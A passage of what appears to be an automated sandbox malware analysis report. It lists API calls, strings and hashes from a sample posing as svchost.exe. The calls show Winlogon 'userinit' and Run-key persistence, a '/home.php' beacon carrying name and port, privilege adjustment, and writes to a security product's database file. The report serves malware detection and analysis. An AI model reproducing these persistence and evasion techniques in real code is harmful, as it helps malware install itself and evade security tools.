                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E718C30E453445BDB21CB78DC84BDEBBBDAF48700F6045A8EA49E7281D3746755CB94
                                                                                                                                                                                                              Function 02CAA1B0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 130filethreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02CAA1CA
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02CAA1D7
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02CAA1F4
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00019E40,?,00000000,00000000), ref: 02CAA23E
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CAA256
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CAA267
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?), ref: 02CAA279
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02CAA291
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CAA2B1
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,00000000,/home.php,?,00000001,?,?,00000001,00000000), ref: 02CAA327
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02CAA334
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleInformationPathTemp$AttributesBackslashCloseCreateDeleteEnvironmentNameThreadVariableVolume_snprintf
                                                                                                                                                                                                              • String ID: %53%59%53%54%45%4D%21%38%31%38%32%32%35%21%43%31%42%34%45%39%44%34$/home.php$SystemDrive$name=%s&port=%u
                                                                                                                                                                                                              • API String ID: 1291007772-498123133
                                                                                                                                                                                                              • Opcode ID: 36e5f7a9fdad5e295a0b42130af4b7b3ed9377c74ae474d8062f2bc9b85ec24a
                                                                                                                                                                                                              • Instruction ID: 3123b901596a2247f6dc528b3b48bec08e7f41762b84947bbb0aef14a77a3d1c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36e5f7a9fdad5e295a0b42130af4b7b3ed9377c74ae474d8062f2bc9b85ec24a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1441D371A812197BEB24DBA0CC59FFA777DDB44705F404694F606E61C0EBF19A84CB60
                                                                                                                                                                                                              Function 00402540 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040255C
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004025C0
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004025E3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025F8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 00402604
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402613
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 0040261F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040262E
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040263A
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402649
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402655
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402664
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00402667
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                              • String ID: \PrevxCSI\csidb.csi
                                                                                                                                                                                                              • API String ID: 606440919-2829233815
                                                                                                                                                                                                              • Opcode ID: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                              • Instruction ID: 8b448ea0795f31fda95dadee176b54ca291314fb6d6361d02f59f031212173a5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D93128716842187EF311EB90DC9AFEE7768EB89B00F104165F304AA1D0DBF16A45CBE9
                                                                                                                                                                                                              Function 02C93300 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 80registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02C93325
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02C93344
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02C93351
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02C9336E
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02C93389
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02C933A7
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,00000000), ref: 02C933DE
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02C933FC
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 02C9340A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • SystemDrive, xrefs: 02C9333F
                                                                                                                                                                                                              • software\microsoft\windows\currentversion\run, xrefs: 02C933D4
                                                                                                                                                                                                              • userinit, xrefs: 02C933F6
                                                                                                                                                                                                              • C:\Windows\apppatch\svchost.exe, xrefs: 02C933B4, 02C933EB
                                                                                                                                                                                                              • software\microsoft\windows nt\currentversion\winlogon, xrefs: 02C9339D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Open$AdminBackslashCloseEnvironmentInformationPathQueryUserValueVariableVolume_snprintf
                                                                                                                                                                                                              • String ID: C:\Windows\apppatch\svchost.exe$SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                              • API String ID: 3780845138-4271125494
                                                                                                                                                                                                              • Opcode ID: c20fb90e0af900f96571d84b47f9d43d3868e0ce602e161060fece7b11fc4f99
                                                                                                                                                                                                              • Instruction ID: 8a3988743a22e4b2dd93100374612712b298910e36b9c59e0a36235e09e221b8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c20fb90e0af900f96571d84b47f9d43d3868e0ce602e161060fece7b11fc4f99
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D213974A91208FBFB10CB90CC8AFEDB77CAB44B44F904598B705A6180D7F06654CBA0
                                                                                                                                                                                                              Function 02C974A0 Relevance: 24.1, APIs: 16, Instructions: 142memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,74DEF380,00000000,00000000,?,?,02CA4E91,?,00000000), ref: 02C974C6
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,02CA4E91,?,00000000,?,?,00000000), ref: 02C974E4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,02CA4E91,?,00000000,?,?,00000000), ref: 02C9750D
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,02CA4E91,?,00000000,?,?,00000000), ref: 02C97514
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C97527
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C97553
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C97563
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02C97572
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02C97585
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C97594
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C9759B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C975A8
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C975AF
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C975CF
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 02C975E0
                                                                                                                                                                                                              • IsBadWritePtr.KERNEL32(?,00000004,74DEF380,00000000,00000000,?,?,02CA4E91,?,00000000,?,?,00000000), ref: 02C975F0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHeap$Process$AllocateChangeCloseCreateFindFreeHandleInformationLockNotificationPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 213124939-0
                                                                                                                                                                                                              • Opcode ID: 552a467efd7f3119eba2df3de58229e447081b32aa4661a4e1dabda33925329c
                                                                                                                                                                                                              • Instruction ID: 28a89ee49c0e301bc322faf0da3d861fa86ce0e405087a911a86f3a9e645477f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 552a467efd7f3119eba2df3de58229e447081b32aa4661a4e1dabda33925329c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1841B6B1E52304BBDB209FA59C4CFAFBB6CEF84751F508619FA05E6180D7749618CBA0
                                                                                                                                                                                                              Function 02C97350 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 125fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,74DEF380,00000000,00000000,?,00000000,00000000,?,00000000), ref: 02C9738D
                                                                                                                                                                                                                • Part of subcall function 02CB5930: GetCurrentThread.KERNEL32 ref: 02CB5940
                                                                                                                                                                                                                • Part of subcall function 02CB5930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB5947
                                                                                                                                                                                                                • Part of subcall function 02CB5930: GetCurrentProcess.KERNEL32(00000020,02CA4D1B,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB5957
                                                                                                                                                                                                                • Part of subcall function 02CB5930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB595E
                                                                                                                                                                                                                • Part of subcall function 02CB5930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02CB5981
                                                                                                                                                                                                                • Part of subcall function 02CB5930: AdjustTokenPrivileges.KERNELBASE(02CA4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02CB599B
                                                                                                                                                                                                                • Part of subcall function 02CB5930: GetLastError.KERNEL32 ref: 02CB59A5
                                                                                                                                                                                                                • Part of subcall function 02CB5930: FindCloseChangeNotification.KERNEL32(02CA4D1B), ref: 02CB59B6
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02C973B4
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?), ref: 02C973D5
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 02C973EE
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 02C973F8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000), ref: 02C9740C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02C9741B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02C9742D
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02C9743D
                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000), ref: 02C9744A
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C9746C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C9747D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Security$DescriptorToken$CloseCurrentHandleOpenProcessThread$AdjustChangeConvertCreateErrorFindFreeInfoInformationLastLocalLockLookupNamedNotificationPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 2010133961-820036962
                                                                                                                                                                                                              • Opcode ID: b5671288c680860970033c13953db2e95e679484982dad006f9d5d4ee6cb70ab
                                                                                                                                                                                                              • Instruction ID: 78c4bd81f9788e5515b5f8f4e9d8e7b97b0bf8b65266cba9d84a2b35723494c7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5671288c680860970033c13953db2e95e679484982dad006f9d5d4ee6cb70ab
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC41D675A92208BBEB109F54DC49FEEBB6CEF85B95F508115FE04DA1C0D7709608CBA0
                                                                                                                                                                                                              Function 00402930 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 106registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCreateKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040296B
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402986
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 00402993
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 004029B0
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 004029CB
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 00402A1A
                                                                                                                                                                                                              • RegSetValueExA.KERNELBASE(00000000,userinit,00000000,00000001,?,?), ref: 00402A3E
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(00000000), ref: 00402A4D
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402A57
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • userinit, xrefs: 00402A38
                                                                                                                                                                                                              • software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402953
                                                                                                                                                                                                              • software\microsoft\windows\currentversion\run, xrefs: 00402A10
                                                                                                                                                                                                              • SystemDrive, xrefs: 00402981
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create$BackslashCloseEnvironmentFlushInformationPathValueVariableVolume_snprintf
                                                                                                                                                                                                              • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                              • API String ID: 3547530944-2324515132
                                                                                                                                                                                                              • Opcode ID: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                              • Instruction ID: cfc36ad3083988d5491cb46672b4500e56a1c5dd6b6f1e6a0940d5df759a06a8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F93147B5740305BBE720DB54DE4AFEA777CDB95B00F204155FB44BA1C0DAF4AA448BA8
                                                                                                                                                                                                              Function 00401CF0 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 90processthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D27
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                              • SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,?), ref: 00401D9A
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,kernel), ref: 00401DBC
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,.dll), ref: 00401DC8
                                                                                                                                                                                                              • Module32Next.KERNEL32(00000000,00000224), ref: 00401DD6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateModule32SnapshotToolhelp32$ChangeCloseErrorFindFirstHandleInformationLastNextNotificationSwitchThreadmemset
                                                                                                                                                                                                              • String ID: .dll$kernel
                                                                                                                                                                                                              • API String ID: 1233480013-2375045364
                                                                                                                                                                                                              • Opcode ID: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                              • Instruction ID: c283e2339ecb9e17340db761c1aee5b765af185a9d94a0bcce3757d144b29585
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8621AB72A012146BD710ABA5AD4CFDF77A89F99321F100276EA14F32E0EA34ED458768
                                                                                                                                                                                                              Function 02CB5680 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 90processthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB56A6
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02CB56B7
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB56C0
                                                                                                                                                                                                              • SwitchToThread.KERNEL32 ref: 02CB56CF
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02CB56D8
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CB56F8
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB5709
                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,?), ref: 02CB572A
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,kernel), ref: 02CB574C
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,.dll), ref: 02CB5758
                                                                                                                                                                                                              • Module32Next.KERNEL32(00000000,00000224), ref: 02CB5766
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                              • String ID: .dll$kernel
                                                                                                                                                                                                              • API String ID: 2979424695-2375045364
                                                                                                                                                                                                              • Opcode ID: db1c0af3cb18abd3377bebfd1ec0b683ae825625c871ccd5fab2cc8c5bf99388
                                                                                                                                                                                                              • Instruction ID: 38bad47e70533411f1a643d868e0cf87a1a10a8e31787184bc3a1e6894b4c0f6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: db1c0af3cb18abd3377bebfd1ec0b683ae825625c871ccd5fab2cc8c5bf99388
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D21AB31B42114EBD7219AB9AC48FDE77ACEF893A5F940355E905E3180EB30DE4587A0
                                                                                                                                                                                                              Function 02C96C70 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 109registrymemorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C96CA1
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C96CBF
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 02C96CDB
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,5DD2BAAFa,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02C96D02
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02C96D7A
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02C96D81
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C96D95
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02C96DAE
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 02C96DBC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                              • String ID: 5DD2BAAFa$software\microsoft
                                                                                                                                                                                                              • API String ID: 217510255-2040404611
                                                                                                                                                                                                              • Opcode ID: 60332f409f1ee42d00cb78cd94cc3effdbcc594b4398df2229774b5170a52601
                                                                                                                                                                                                              • Instruction ID: 165cefc3dbf7873501a0f5838c451470dfb189a95793374e7e9a0c9b9d08e8e9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 60332f409f1ee42d00cb78cd94cc3effdbcc594b4398df2229774b5170a52601
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F31F671E412286AEF25DB79CC4DBEE7B6CAF08744F500598E659E2180D7B04B848BE1
                                                                                                                                                                                                              Function 02C96B10 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 102registrymemorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C96B41
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C96B5F
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(00000001,software\microsoft,00000000,00000101,80000001,?,?,?,?,?,00000000), ref: 02C96B7A
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(80000001,5DD2BAAFa,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02C96BA1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02C96C1A
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02C96C21
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C96C35
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02C96C4E
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02C96C5C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
